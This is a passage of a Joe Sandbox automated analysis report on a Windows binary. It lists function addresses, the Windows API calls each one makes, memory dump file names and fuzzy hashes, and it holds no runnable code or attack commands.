WSAGetLastError.WSOCK32 ref: 00A7284F
htons.WSOCK32(?,?,?,?,?), ref: 00A72938
inet_ntoa.WSOCK32(?), ref: 00A728E9

Part of subcall function 00A5433E: _strlen.LIBCMT ref: 00A54348

Part of subcall function 00A73C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A6F669), ref: 00A73C9D

_strlen.LIBCMT ref: 00A72992

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: ba6e6ab76e32bde760372eb4710e4f1dcf9588c216d945ebbf8f80ae8e2acd74
Instruction ID: 7e1d4698ae5e2a3a4e82d0b6aca6e84709e61d84c13cb271b66fb0a7fc91b711
Opcode Fuzzy Hash: ba6e6ab76e32bde760372eb4710e4f1dcf9588c216d945ebbf8f80ae8e2acd74
Instruction Fuzzy Hash: 22B1BE71604300AFD324DF24C885F6ABBA5AF84318F54C54CF59A4B2E2DB71ED86CB91

Function 00A20527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00A2042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A20446
__allrem.LIBCMT ref: 00A2045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A2047B
__allrem.LIBCMT ref: 00A20492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A204B0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: 7121ae5ac4325d23013cf382635faea04984b7d44bd660310cf5ee67476bec53
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 8281F8726007259BD720EF6DED81FAAB3A9AF54320F24813AF511DB683E770D9408754

Function 00A26571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A18649,00A18649,?,?,?,00A267C2,00000001,00000001,8BE85006), ref: 00A265CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A267C2,00000001,00000001,8BE85006,?,?,?), ref: 00A26651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A2674B
__freea.LIBCMT ref: 00A26758

Part of subcall function 00A23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A16A79,?,0000015D,?,?,?,?,00A185B0,000000FF,00000000,?,?), ref: 00A23BC5

__freea.LIBCMT ref: 00A26761
__freea.LIBCMT ref: 00A26786

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 609929361261e4b57ca2fdcb222fa18567f5ed165fb87ee6446678fdb30744cc
Instruction ID: 8a0ed6892145d83a2da039a16529f6ecbf214453280a6eafa1238cf1eba3185b
Opcode Fuzzy Hash: 609929361261e4b57ca2fdcb222fa18567f5ed165fb87ee6446678fdb30744cc
Instruction Fuzzy Hash: 0251F072A01226AFEB298F68ED85FBB77AAEF40714F144678FC04D6140EB34DC5086A0

Function 00A7C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7C10E,?,?), ref: 00A7D415
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D451
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D4C8
Part of subcall function 00A7D3F8: _wcslen.LIBCMT ref: 00A7D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A7C785
RegCloseKey.ADVAPI32(00000000), ref: 00A7C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A7C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A7C853
RegCloseKey.ADVAPI32(?), ref: 00A7C85F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: dd50b8a94dfdce7f93ba874675a40b2d1e12f1e36dc5ce469f220f19cf647d8f
Instruction ID: 854109acb7362e784676985098a3d5846aaecc08f86c10dcd8841b33ca9f667d
Opcode Fuzzy Hash: dd50b8a94dfdce7f93ba874675a40b2d1e12f1e36dc5ce469f220f19cf647d8f
Instruction Fuzzy Hash: 43816C71208245AFC714DF24C895E2ABBF5BF84318F14C55CF59A4B2A2DB31ED46CB92

Function 00A5009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00A500A9
SysAllocString.OLEAUT32(00000000), ref: 00A50150
VariantCopy.OLEAUT32(00A50354,00000000), ref: 00A50179
VariantClear.OLEAUT32(00A50354), ref: 00A5019D
VariantCopy.OLEAUT32(00A50354,00000000), ref: 00A501A1
VariantClear.OLEAUT32(?), ref: 00A501AB

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: be63d6abc3712152dbce44913da0f9388da779e7fa732751aff48969c17f8d15
Instruction ID: edb8d3657c39e33dd51ea19de8c6ba57de7d2d9de269d82786ee38a28104dae0
Opcode Fuzzy Hash: be63d6abc3712152dbce44913da0f9388da779e7fa732751aff48969c17f8d15
Instruction Fuzzy Hash: 6151D671600314AACF20AB649889F6DB3B5FF55312F249846EE06DF2D6DB709C88CB56

Function 00A69B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 009F41EA: _wcslen.LIBCMT ref: 009F41EF

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00A69F2A
_wcslen.LIBCMT ref: 00A69F4B
_wcslen.LIBCMT ref: 00A69F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00A69FCA

Strings

X, xrefs: 00A69E57

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: ad4f964adf86a58647ce008d64c8adfb83bc68209f577b629948f1881ea1beb7
Instruction ID: 641e414dfe308aefd2453acace6a3fc7bbadc6f9fdd21bca5094dfea58ff327b
Opcode Fuzzy Hash: ad4f964adf86a58647ce008d64c8adfb83bc68209f577b629948f1881ea1beb7
Instruction Fuzzy Hash: 32E17B716083009FCB24EF24C881B6AB7F4BF85314F05896DF9999B2A2DB71DD45CB92

Function 00A66ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A66F21
CoInitialize.OLE32(00000000), ref: 00A6707E
CoCreateInstance.OLE32(00A90CC4,00000000,00000001,00A90B34,?), ref: 00A67095
CoUninitialize.OLE32 ref: 00A67319

Strings

.lnk, xrefs: 00A66EFF, 00A66F69, 00A67025

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 9440e80d01fad6a22539a601f7accc0d4c6c72d04424e0c577f3614c148fd4da
Instruction ID: ea672fa43be2edbe52af6662ad390a93f49ec4223833155776d4c02575eda90f
Opcode Fuzzy Hash: 9440e80d01fad6a22539a601f7accc0d4c6c72d04424e0c577f3614c148fd4da
Instruction Fuzzy Hash: 98D13871508205AFC304EF64C881E6BB7E8FF98708F50496DF6958B2A2DB71ED45CB92

Function 009F1B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 009F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009F24B0

BeginPaint.USER32(?,?,?), ref: 009F1B35
GetWindowRect.USER32(?,?), ref: 009F1B99
ScreenToClient.USER32(?,?), ref: 009F1BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009F1BC7
EndPaint.USER32(?,?,?,?,?), ref: 009F1C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A33287

Part of subcall function 009F1C2D: BeginPath.GDI32(00000000), ref: 009F1C4B

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 8f0baf285d1cdd191e6817952373f82ac6aa046b18bd434f89543f331584a7f5
Instruction ID: 1057fc15f945cd02c8b4320677d5e272a08549d875bd8aa00dafdc578214f965
Opcode Fuzzy Hash: 8f0baf285d1cdd191e6817952373f82ac6aa046b18bd434f89543f331584a7f5
Instruction Fuzzy Hash: F141AF71104304EFDB10DF64DC84FB77BA8EB55324F040669FAA4861B1C7709945DBA1

Function 00A61196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00A611B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A611EE
EnterCriticalSection.KERNEL32(?), ref: 00A6120A
LeaveCriticalSection.KERNEL32(?), ref: 00A61283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A6129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00A612C8

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 7afe4f61fbeb89ce9ffceadba3150ae450a8d48e60cf1b8278949e777f06d9d1
Instruction ID: 4a6e18bdcefb8e62b1a45f340a19cdcc80f02f6a3a13d04d1cfa304754f47ed1
Opcode Fuzzy Hash: 7afe4f61fbeb89ce9ffceadba3150ae450a8d48e60cf1b8278949e777f06d9d1
Instruction Fuzzy Hash: 7F414071900205EFDF04DF94DD85AAABBB8FF44710F1441A9EE009A296D774DE91DBA0

Function 00A88C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A4FBEF,00000000,?,?,00000000,?,00A339E2,00000004,00000000,00000000), ref: 00A88CA7
EnableWindow.USER32(?,00000000), ref: 00A88CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A88D2C
ShowWindow.USER32(?,00000004), ref: 00A88D40
EnableWindow.USER32(?,00000001), ref: 00A88D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A88D8A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 79f9d987a78782775f30502e7b24f5645e7a09d795e3d3bfa71a991a8cbf94ce
Instruction ID: 7ea25b5054404fa38f9a5ccf52f00896c820b887e4ece64d4bd23963dc2a9c35
Opcode Fuzzy Hash: 79f9d987a78782775f30502e7b24f5645e7a09d795e3d3bfa71a991a8cbf94ce
Instruction Fuzzy Hash: 5A41E174602244AFDB25EF64C889FA17BF1FB45304F5801A9E5088B2B6CF79A857CB60

Function 00A72D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00A72D45

Part of subcall function 00A6EF33: GetWindowRect.USER32(?,?), ref: 00A6EF4B

GetDesktopWindow.USER32 ref: 00A72D6F
GetWindowRect.USER32(00000000), ref: 00A72D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A72DB2
GetCursorPos.USER32(?), ref: 00A72DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A72E3C

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 209aa07a2e325a0e7ebce0fb514f867577c35feda095de398172679d69ecaf8d
Instruction ID: ed07fa7e36f288a5580d36d35b1497d22d800ed166f7866c375b8417a9e39007
Opcode Fuzzy Hash: 209aa07a2e325a0e7ebce0fb514f867577c35feda095de398172679d69ecaf8d
Instruction Fuzzy Hash: 9831AF72505315AFC720DF54CC49F9BB7A9FBC4354F00492AF89997182DA30E9498B92

Function 00A555E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00A555F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A55616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A5564E
_wcslen.LIBCMT ref: 00A5566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A55674
_wcsstr.LIBVCRUNTIME ref: 00A5567E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 9effd0c6149dd6e1a96b15dd434674b5793528844aa768a29be4745c42f8f0c6
Instruction ID: f737bb06f8549f12d76ed0b19497c94a468f429902ad862f43e3e9e48db8f313
Opcode Fuzzy Hash: 9effd0c6149dd6e1a96b15dd434674b5793528844aa768a29be4745c42f8f0c6
Instruction Fuzzy Hash: CC210472604644BBEB159B79DC59EBBBBA9EF44721F184029FC05CA091EBB4CC8197A0

Function 00A66263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 009F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F55D1,?,?,00A34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 009F5871

_wcslen.LIBCMT ref: 00A662C0
CoInitialize.OLE32(00000000), ref: 00A663DA
CoCreateInstance.OLE32(00A90CC4,00000000,00000001,00A90B34,?), ref: 00A663F3
CoUninitialize.OLE32 ref: 00A66411

Strings

.lnk, xrefs: 00A662BB, 00A66306, 00A663CA

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 3ca276c5c1e38048743ef7632c773b7e6f93fbfa00baebf6a8d58b91442c39a5
Instruction ID: 451d2d956f4d9b5ffc4edfc0ed6ca2ac8fce31b94c201d84b8de115b45aa375b
Opcode Fuzzy Hash: 3ca276c5c1e38048743ef7632c773b7e6f93fbfa00baebf6a8d58b91442c39a5
Instruction Fuzzy Hash: 86D13271A042059FCB14DF28C584A6ABBF5FF89714F14885DF98A9B361CB31EC45CB92

Function 00A886FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00A88740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A88765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A8877D
GetSystemMetrics.USER32(00000004), ref: 00A887A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A6C1F2,00000000), ref: 00A887C6

Part of subcall function 009F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009F24B0

GetSystemMetrics.USER32(00000004), ref: 00A887B1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 42f18e7210b43b81290ce125a3d8641d02ff3ddb7a3d5d24a6ce5308268fb71a
Instruction ID: eeb52614c93756d54623dccebca5c146bf99c92e08649937e316756b625f3fcf
Opcode Fuzzy Hash: 42f18e7210b43b81290ce125a3d8641d02ff3ddb7a3d5d24a6ce5308268fb71a
Instruction Fuzzy Hash: 96217F71610246AFCB14AF78CC48B6A3BB6FB85365F654A29F926C21F0EF348851CB50

Function 00A136F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A136E9,00A13355), ref: 00A13700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A1370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A13727
SetLastError.KERNEL32(00000000,?,00A136E9,00A13355), ref: 00A13779

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ddb6da0fd6ba7726f2d4d2f3f82dffb91635caa68ef1df6cff253ec466ae4b35
Instruction ID: 1cc283ff4c3b486f7550f1a42f58a7fdcb7461789524ef85d8c6bbe9fba54503
Opcode Fuzzy Hash: ddb6da0fd6ba7726f2d4d2f3f82dffb91635caa68ef1df6cff253ec466ae4b35
Instruction Fuzzy Hash: 6201B1B761A3116EAE24BFF9BD866EA2A98EB157B17200339F111550F1EF524D829240

Function 00A230E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00A14D53,00000000,?,?,00A168E2,?,?,00000000), ref: 00A230EB
_free.LIBCMT ref: 00A2311E
_free.LIBCMT ref: 00A23146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00A23153
SetLastError.KERNEL32(00000000,?,00000000), ref: 00A2315F
_abort.LIBCMT ref: 00A23165

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: b00c933d5b2555133baacf3b1236f83ebd317183a5c7d984868e31c12156e415
